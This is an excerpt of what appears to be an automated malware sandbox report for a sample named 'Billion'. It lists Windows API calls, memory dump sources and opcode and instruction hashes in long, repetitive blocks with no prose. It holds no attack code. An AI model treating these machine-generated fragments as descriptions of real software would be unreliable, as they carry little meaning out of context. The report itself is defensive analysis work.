                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b3b9302554ba7a051f5846fea0a00c26c1e5c0681892ea1fb2b62317ca82e9e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E111227A200342ABCF159F78D844E7A77A9FF5A750B10402AFD02CB2A0EF31D912C7A1
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001060,?,00000004), ref: 001C615A
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001C616C
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001C6177
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 001C62B5
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend_wcslen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 455545452-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2da8482f63164166308650e94570f6eeb2ad4432f195697845427885800184eb
                                                                                                                                                                                                                                                                                                          • Instruction ID: 9d568e5585403aa05751feec35aa970b5c50140310cc448f4de0aaf404b113ea
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2da8482f63164166308650e94570f6eeb2ad4432f195697845427885800184eb
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C119075600218AADB24DFA49C84FEF7BBCEB75754B14412EFA15D6082EBB0D984CB60
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                          • Opcode ID: b18789fc4a0ef4e9dc48b5284aef3a508d67b06f568e830200e5ea92c9b52fea
                                                                                                                                                                                                                                                                                                          • Instruction ID: 10797fcfe4abdfbb1376f85e9ad739f73bdda1f729a65cb5e9e592cd851a95d4
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b18789fc4a0ef4e9dc48b5284aef3a508d67b06f568e830200e5ea92c9b52fea
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC01D1B2609A167FFA2126BCBCC1F676B4DDF527B8B350325F521A11D1DF708CA09160
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00192394
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001923A6
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001923BC
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001923D7
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0019EB14
                                                                                                                                                                                                                                                                                                          • MessageBoxW.USER32(?,?,?,?), ref: 0019EB47
                                                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0019EB5D
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0019EB64
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2880819207-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,?,0015D369,00000000,00000004,00000000), ref: 0015D588
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0015D594
                                                                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 0015D59B
                                                                                                                                                                                                                                                                                                          • ResumeThread.KERNEL32(00000000), ref: 0015D5B9
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 173952441-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001378B1
                                                                                                                                                                                                                                                                                                          • GetStockObject.GDI32(00000011), ref: 001378C5
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 001378CF
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3970641297-0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,0016338D,00000364,00000000,00000000,00000000,?,001635FE,00000006,FlsSetValue), ref: 00163418
                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,0016338D,00000364,00000000,00000000,00000000,?,001635FE,00000006,FlsSetValue,001D3260,FlsSetValue,00000000,00000364,?,001631B9), ref: 00163424
                                                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0016338D,00000364,00000000,00000000,00000000,?,001635FE,00000006,FlsSetValue,001D3260,FlsSetValue,00000000), ref: 00163432
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 509c827343d23ff205fff5c72aebeb38d06308ae06f1f219e7908dda22e45442
                                                                                                                                                                                                                                                                                                          • Instruction ID: 1109682f2bb2b568f6fbb99013044b4412bdaa12b7641d1f86f15087a1050b15
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 509c827343d23ff205fff5c72aebeb38d06308ae06f1f219e7908dda22e45442
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76018432A122229BCB224B79AC44D56BB58FF15BB17220630F926D7681DB20DD51C6E0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0019B69A,?,00008000), ref: 0019BA8B
                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0019B69A,?,00008000), ref: 0019BAB0
                                                                                                                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0019B69A,?,00008000), ref: 0019BABA
                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0019B69A,?,00008000), ref: 0019BAED
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2875609808-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 444fa8db81ef3336b0860504c715a552638005b688762f9cf90c2b612e9b60e0
                                                                                                                                                                                                                                                                                                          • Instruction ID: e0c45b60ef4fefbf72d779d58568ea7be51faf434e5557d1ef3fd26cf4d32617
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 444fa8db81ef3336b0860504c715a552638005b688762f9cf90c2b612e9b60e0
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5113C71C04519E7CF04AFE5FA89AEEBB78BF09711F124095D541B3580CB309650CBA5
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 001C888E
                                                                                                                                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 001C88A6
                                                                                                                                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 001C88CA
                                                                                                                                                                                                                                                                                                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 001C88E5
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 357397906-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 3a0931513b1565392ed87e1406fcf7447f0d00014ff8dbc8c77e2895eaf188b5
                                                                                                                                                                                                                                                                                                          • Instruction ID: 15fdb183d581b981c0027f9c210b91d3660ceca2d9550441892a1351227da811
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a0931513b1565392ed87e1406fcf7447f0d00014ff8dbc8c77e2895eaf188b5
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 351140B9D00219AFDB41CFA8D884AEEBBB5FB08310F508166E915E2650E735AA94CF50
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00193712
                                                                                                                                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00193723
                                                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0019372A
                                                                                                                                                                                                                                                                                                          • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00193731
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2710830443-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: b2e81fc5204de66e208bb502d9b1bb8a8c3f726975e38caf92d65ef106733d1c
                                                                                                                                                                                                                                                                                                          • Instruction ID: 3b8c6fbf10f73baefb971acdef2d3d1a4a480aa9506aab347ac1f956c320b6f1
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b2e81fc5204de66e208bb502d9b1bb8a8c3f726975e38caf92d65ef106733d1c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FEE092B11012347BDF2417A2AC4EEEBBF6CDF42BA1F400025F105D2480DBB0C981C2B0
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00131F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00131F87
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00131F2D: SelectObject.GDI32(?,00000000), ref: 00131F96
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00131F2D: BeginPath.GDI32(?), ref: 00131FAD
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00131F2D: SelectObject.GDI32(?,00000000), ref: 00131FD6
                                                                                                                                                                                                                                                                                                          • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 001C92E3
                                                                                                                                                                                                                                                                                                          • LineTo.GDI32(?,?,?), ref: 001C92F0
                                                                                                                                                                                                                                                                                                          • EndPath.GDI32(?), ref: 001C9300
                                                                                                                                                                                                                                                                                                          • StrokePath.GDI32(?), ref: 001C930E
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1539411459-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: f0928f6660e952a3a51b054fbbc98b1b14899d2ca74d3a49e569e60cbcb3b4ff
                                                                                                                                                                                                                                                                                                          • Instruction ID: c8b3deb11d7b54191619f402b7b993cc9c63ca0d672f80bbdf24c22a9aa8d79e
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f0928f6660e952a3a51b054fbbc98b1b14899d2ca74d3a49e569e60cbcb3b4ff
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CF05E32005258BADB125F58BC0EFCE3F69AF1A320F148005FA11214E2C775D566DBA5
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(00000008), ref: 001321BC
                                                                                                                                                                                                                                                                                                          • SetTextColor.GDI32(?,?), ref: 001321C6
                                                                                                                                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 001321D9
                                                                                                                                                                                                                                                                                                          • GetStockObject.GDI32(00000005), ref: 001321E1
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Color$ModeObjectStockText
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 4037423528-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 8b9b38400f126d6e43721b5e82f3a41f989c2eea87922d3fe72191ae2422a986
                                                                                                                                                                                                                                                                                                          • Instruction ID: 716064f7c11ea9368ca908e6c04956c6e9c084e72e42747214db92d6fbfb1550
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b9b38400f126d6e43721b5e82f3a41f989c2eea87922d3fe72191ae2422a986
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1E0E531240640AEDB215B74BC09FE97F61AB15735F18C229F7B9544E0C771C685AB11
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 0018EC36
                                                                                                                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 0018EC40
                                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0018EC60
                                                                                                                                                                                                                                                                                                          • ReleaseDC.USER32(?), ref: 0018EC81
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: e08628b8a6100b0e94575a311e7b518efb7a5d763e0f603267d2f3f217bbc173
                                                                                                                                                                                                                                                                                                          • Instruction ID: 4f1eb6679d129a415a113b282bb74c0754da7a6e8ad3e9bc76cdf367508b73fc
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e08628b8a6100b0e94575a311e7b518efb7a5d763e0f603267d2f3f217bbc173
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76E0E5B0800214EFCB40AFA0A908E5DBFF1BB18310F108469F84AE3650C7389982DF00
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 0018EC4A
                                                                                                                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 0018EC54
                                                                                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0018EC60
                                                                                                                                                                                                                                                                                                          • ReleaseDC.USER32(?), ref: 0018EC81
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmp
